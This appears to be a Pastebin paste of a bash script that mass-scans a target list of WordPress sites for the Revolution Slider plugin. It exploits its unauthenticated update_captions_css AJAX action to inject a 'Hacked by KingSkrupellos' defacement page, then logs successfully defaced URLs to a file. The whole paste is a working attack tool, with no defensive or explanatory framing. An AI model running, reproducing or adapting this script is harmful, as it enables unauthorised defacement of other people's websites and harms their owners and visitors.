API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 22nd, 2020
122
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.45 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2. #coded = IBT
  3. SS(){
  4. curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
  5. -H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
  6. -H "Accept-Language: en-us,en;q=0.5" \
  7. -H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
  8. -F "client_action=update_captions_css" \
  9. -F "action=revslider_ajax_action" \
  10. -F "data=x$(cat tmp/s.txt)" \
  11. --request POST "http://${1}/wp-admin/admin-ajax.php"
  12. }
  13. CD(){
  14. if [ -f tmp/cd.txt ];then
  15. rm -f tmp/cd.txt
  16. fi
  17. curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" -o tmp/cd.txt
  18. if [ ! -f tmp/cd.txt ];then
  19. echo "--> $urlnya : not vuln"
  20. continue
  21. fi
  22. cat tmp/cd.txt | grep -i "KingSkrupellos" > /dev/null;cd=$?
  23. if [ $cd -eq 0 ];then
  24. echo "--> ${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css : exploit success"
  25. echo "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" >> success.txt
  26. else
  27. echo "--> $urlnya : exploit failed"
  28. fi
  29. }
  30. CV(){
  31. if [ -f tmp/cv.txt ];then
  32. rm -f tmp/cv.txt
  33. fi
  34. curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action" -o tmp/cv.txt
  35. if [ ! -f tmp/cv.txt ];then
  36. echo "--> $urlnya : not vuln"
  37. continue
  38. fi
  39. cat tmp/cv.txt | grep "wrong ajax action:" > /dev/null;cv=$?
  40. if [ $cv -eq 1 ];then
  41. echo "--> $urlnya : not vuln"
  42. continue
  43. else
  44. echo "--> $urlnya : found revslider"
  45. fi
  46. }
  47. Exp(){
  48. for url in `cat $list`
  49. do
  50. urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1' | awk '{gsub("//","/")}1')
  51. if [ ! -f load.txt ];then
  52. touch load.txt
  53. fi
  54. cat load.txt | grep "$urlnya" > /dev/null;ccl=$?
  55. if [ $ccl -eq 1 ];then
  56. echo $urlnya >> load.txt
  57. else
  58. #udah pernah di load di file load.txt
  59. #kalau mau load ulang,silakan hapus file load.txt
  60. continue
  61. fi
  62. echo "--> $urlnya : check"
  63. CV $urlnya
  64. SS $urlnya
  65. CD $urlnya
  66. done
  67. }
  68. Lengkap(){
  69. if [ ! -f $list ];then
  70. echo "[!] $list not exist"
  71. exit
  72. fi
  73. if [ ! -d tmp ];then
  74. mkdir tmp
  75. fi
  76. if [ ! -f tmp/s.txt ];then
  77. cat > tmp/s.txt <<_script
  78. <body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Army<p style='color: transparent'>
  79. _script
  80. fi
  81. Exp
  82. }
  83. read -p "[+] Enter list target = " list
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!